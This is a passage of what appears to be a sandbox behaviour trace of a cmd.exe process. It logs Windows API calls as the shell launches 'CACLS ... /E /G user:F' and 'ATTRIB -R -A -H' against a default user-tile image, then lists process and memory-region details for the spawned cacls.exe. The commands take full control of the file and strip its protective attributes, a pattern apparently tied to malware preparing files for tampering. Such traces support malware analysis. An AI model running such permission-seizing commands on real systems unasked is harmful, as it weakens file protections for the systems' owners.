lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0184.422] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1af958, lpFilePart=0x1af954 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", 
lpFilePart=0x1af954*="Desktop") returned 0x18 [0184.422] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0184.422] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1af6d4 | out: lpFindFileData=0x1af6d4) returned 0x2d0ae8 [0184.422] FindClose (in: hFindFile=0x2d0ae8 | out: hFindFile=0x2d0ae8) returned 1 [0184.422] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1af6d4 | out: lpFindFileData=0x1af6d4) returned 0x2d0ae8 [0184.422] FindClose (in: hFindFile=0x2d0ae8 | out: hFindFile=0x2d0ae8) returned 1 [0184.422] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1af6d4 | out: lpFindFileData=0x1af6d4) returned 0x2d0ae8 [0184.422] FindClose (in: hFindFile=0x2d0ae8 | out: hFindFile=0x2d0ae8) returned 1 [0184.422] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0184.423] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0184.423] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0184.423] GetEnvironmentStringsW () returned 0x2d0308* [0184.423] FreeEnvironmentStringsW (penv=0x2d0308) returned 1 [0184.423] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0184.423] GetConsoleOutputCP () returned 0x1b5 [0184.423] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0184.423] GetUserDefaultLCID () returned 0x409 [0184.424] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0184.424] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1afa98, cchData=128 | out: lpLCData="0") returned 2 [0184.424] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1afa98, cchData=128 | out: 
lpLCData="0") returned 2 [0184.424] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1afa98, cchData=128 | out: lpLCData="1") returned 2 [0184.424] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0184.424] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0184.424] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0184.424] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0184.424] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0184.424] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0184.424] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0184.424] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0184.424] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0184.424] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0184.424] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0184.425] GetConsoleTitleW (in: lpConsoleTitle=0x2c09b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0184.425] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0184.425] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0184.426] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0184.426] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0184.427] 
GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0184.427] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0184.427] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0184.427] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0184.427] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0184.427] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0184.427] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0184.427] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0184.430] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0184.430] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0184.430] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0184.430] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0184.430] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0184.430] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0184.430] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0184.433] GetConsoleTitleW (in: lpConsoleTitle=0x1af72c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0184.434] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0184.434] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0184.434] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0184.434] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0184.434] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0184.434] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0184.434] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0184.434] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0184.434] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0184.434] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0184.434] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0184.434] _wcsicmp (_String1="CACLS", 
_String2="PAUSE") returned -13 [0184.434] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0184.434] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0184.434] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0184.434] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0184.434] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0184.434] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0184.434] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0184.434] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0184.434] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0184.434] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0184.434] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0184.434] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0184.434] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0184.434] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0184.434] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0184.434] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0184.434] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0184.434] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0184.434] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0184.434] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0184.434] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0184.434] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0184.434] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0184.435] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0184.435] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0184.435] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0184.435] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0184.435] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0184.435] _wcsicmp 
(_String1="CACLS", _String2="COLOR") returned -14 [0184.435] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0184.435] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0184.435] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0184.435] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0184.435] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0184.435] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0184.435] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0184.435] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0184.435] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0184.435] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0184.435] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0184.435] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0184.435] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0184.435] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0184.435] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0184.435] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0184.435] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0184.435] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0184.435] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0184.435] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0184.435] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0184.435] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0184.435] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0184.435] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0184.435] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0184.435] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0184.435] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0184.435] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0184.436] _wcsicmp 
(_String1="CACLS", _String2="EXIT") returned -2 [0184.436] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0184.436] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0184.436] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0184.436] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0184.436] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0184.436] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0184.436] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0184.436] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0184.436] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0184.436] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0184.436] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0184.436] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0184.436] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0184.436] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0184.436] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0184.436] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0184.436] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0184.436] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0184.437] SetErrorMode (uMode=0x0) returned 0x0 [0184.437] SetErrorMode (uMode=0x1) returned 0x0 [0184.437] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x2d1e98, lpFilePart=0x1af24c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1af24c*="Desktop") returned 0x18 [0184.437] SetErrorMode (uMode=0x0) returned 0x1 [0184.437] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0184.437] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0184.442] GetEnvironmentVariableW (in: 
lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0184.443] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x1aefc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aefc8) returned 0xffffffff [0184.443] GetLastError () returned 0x2 [0184.443] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x1aefc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aefc8) returned 0xffffffff [0184.443] GetLastError () returned 0x2 [0184.443] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x1aefc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aefc8) returned 0x2d2180 [0184.444] FindClose (in: hFindFile=0x2d2180 | out: hFindFile=0x2d2180) returned 1 [0184.444] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x1aefc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aefc8) returned 0xffffffff [0184.444] GetLastError () returned 0x2 [0184.444] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x1aefc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aefc8) returned 0x2d2180 [0184.444] FindClose (in: hFindFile=0x2d2180 | out: hFindFile=0x2d2180) returned 1 [0184.444] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0184.444] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0184.444] GetConsoleTitleW (in: lpConsoleTitle=0x1af4c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0184.444] InitializeProcThreadAttributeList (in: lpAttributeList=0x1af348, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1af410 | out: 
lpAttributeList=0x1af348, lpSize=0x1af410) returned 1 [0184.444] UpdateProcThreadAttribute (in: lpAttributeList=0x1af348, dwFlags=0x0, Attribute=0x60001, lpValue=0x1af408, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1af348, lpPreviousValue=0x0) returned 1 [0184.444] GetStartupInfoW (in: lpStartupInfo=0x1af304 | out: lpStartupInfo=0x1af304*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0184.444] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0184.446] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x1af3a4*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1af3f0 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x1af3f0*(hProcess=0x50, hThread=0x4c, dwProcessId=0x92c, dwThreadId=0xdb0)) returned 1 [0184.449] CloseHandle (hObject=0x4c) returned 1 [0184.449] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 
[0184.449] GetEnvironmentStringsW () returned 0x2d0308* [0184.449] FreeEnvironmentStringsW (penv=0x2d0308) returned 1 [0184.449] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0184.516] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x1af2e4 | out: lpExitCode=0x1af2e4*=0x0) returned 1 [0184.517] CloseHandle (hObject=0x50) returned 1 [0184.519] _vsnwprintf (in: _Buffer=0x1af42c, _BufferCount=0x13, _Format="%08X", _ArgList=0x1af2f0 | out: _Buffer="00000000") returned 8 [0184.519] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0184.519] GetEnvironmentStringsW () returned 0x2d2410* [0184.519] FreeEnvironmentStringsW (penv=0x2d2410) returned 1 [0184.519] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0184.519] GetEnvironmentStringsW () returned 0x2d2410* [0184.519] FreeEnvironmentStringsW (penv=0x2d2410) returned 1 [0184.519] DeleteProcThreadAttributeList (in: lpAttributeList=0x1af348 | out: lpAttributeList=0x1af348) [0184.519] GetConsoleTitleW (in: lpConsoleTitle=0x1af72c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0184.519] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0184.519] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0184.519] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0184.520] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x1aefc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aefc8) returned 0xffffffff [0184.520] GetLastError () returned 0x2 [0184.520] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", 
fInfoLevelId=0x1, lpFindFileData=0x1aefc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aefc8) returned 0xffffffff [0184.520] GetLastError () returned 0x2 [0184.520] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x1aefc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aefc8) returned 0x2ce4d8 [0184.520] FindClose (in: hFindFile=0x2ce4d8 | out: hFindFile=0x2ce4d8) returned 1 [0184.520] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x1aefc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aefc8) returned 0xffffffff [0184.520] GetLastError () returned 0x2 [0184.520] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x1aefc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aefc8) returned 0x2ce4d8 [0184.521] FindClose (in: hFindFile=0x2ce4d8 | out: hFindFile=0x2ce4d8) returned 1 [0184.521] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0184.521] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0184.521] GetConsoleTitleW (in: lpConsoleTitle=0x1af4c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0184.521] InitializeProcThreadAttributeList (in: lpAttributeList=0x1af348, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1af410 | out: lpAttributeList=0x1af348, lpSize=0x1af410) returned 1 [0184.521] UpdateProcThreadAttribute (in: lpAttributeList=0x1af348, dwFlags=0x0, Attribute=0x60001, lpValue=0x1af408, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1af348, lpPreviousValue=0x0) returned 1 [0184.521] GetStartupInfoW (in: lpStartupInfo=0x1af304 | out: lpStartupInfo=0x1af304*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, 
dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0184.521] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0184.521] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x1af3a4*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1af3f0 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp\"", lpProcessInformation=0x1af3f0*(hProcess=0x4c, hThread=0x50, dwProcessId=0x514, dwThreadId=0xdb8)) returned 1 [0184.522] CloseHandle (hObject=0x50) returned 1 [0184.522] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0184.522] GetEnvironmentStringsW () returned 0x2d2410* [0184.523] FreeEnvironmentStringsW (penv=0x2d2410) returned 1 [0184.523] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0184.707] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x1af2e4 | out: lpExitCode=0x1af2e4*=0x0) returned 1 [0184.707] CloseHandle (hObject=0x4c) returned 1 [0184.707] _vsnwprintf (in: _Buffer=0x1af42c, _BufferCount=0x13, _Format="%08X", _ArgList=0x1af2f0 | out: _Buffer="00000000") returned 8 [0184.707] 
SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0184.707] GetEnvironmentStringsW () returned 0x2d2410* [0184.707] FreeEnvironmentStringsW (penv=0x2d2410) returned 1 [0184.707] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0184.707] GetEnvironmentStringsW () returned 0x2d2410* [0184.707] FreeEnvironmentStringsW (penv=0x2d2410) returned 1 [0184.707] DeleteProcThreadAttributeList (in: lpAttributeList=0x1af348 | out: lpAttributeList=0x1af348) [0184.707] _get_osfhandle (_FileHandle=1) returned 0x7 [0184.707] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0184.707] _get_osfhandle (_FileHandle=1) returned 0x7 [0184.707] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0184.708] _get_osfhandle (_FileHandle=0) returned 0x3 [0184.708] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0184.708] SetConsoleInputExeNameW () returned 0x1 [0184.708] GetConsoleOutputCP () returned 0x1b5 [0184.708] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0184.708] SetThreadUILanguage (LangId=0x0) returned 0x409 [0184.708] exit (_Code=0) Process: id = "365" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16a80" os_pid = "0x92c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "364" os_parent_pid = "0xfd0" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 
00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 26222 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 26223 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 26224 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 26225 start_va = 0x190000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 26226 start_va = 0xaa0000 end_va = 0xaa8fff entry_point = 0xaa0000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 26227 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 26228 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 26229 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 26230 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 26231 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 26232 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" 
